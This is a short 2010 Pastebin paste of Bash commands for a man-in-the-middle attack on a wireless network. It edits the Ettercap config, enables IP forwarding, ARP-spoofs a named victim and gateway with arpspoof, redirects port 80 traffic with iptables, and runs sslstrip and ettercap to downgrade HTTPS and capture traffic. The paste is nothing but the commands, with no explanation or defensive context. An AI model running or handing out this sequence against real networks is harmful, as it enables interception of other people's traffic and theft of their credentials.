Advertisement
Guest User

g0tmi1k

a guest
Apr 18th, 2010
1,638
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.32 KB | None | 0 0
  1. kate /etc/etter.conf
  2. >*uncomment redir_command_off in the iptables, linux section*
  3. echo 1 > /proc/sys/net/ipv4/ip_forward
  4. arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
  5.  
  6. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
  7. ettercap -T -q -i wlan0
  8.  
  9. sslstrip -a -k -f
  10. ettercap -T -q -i wlan0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement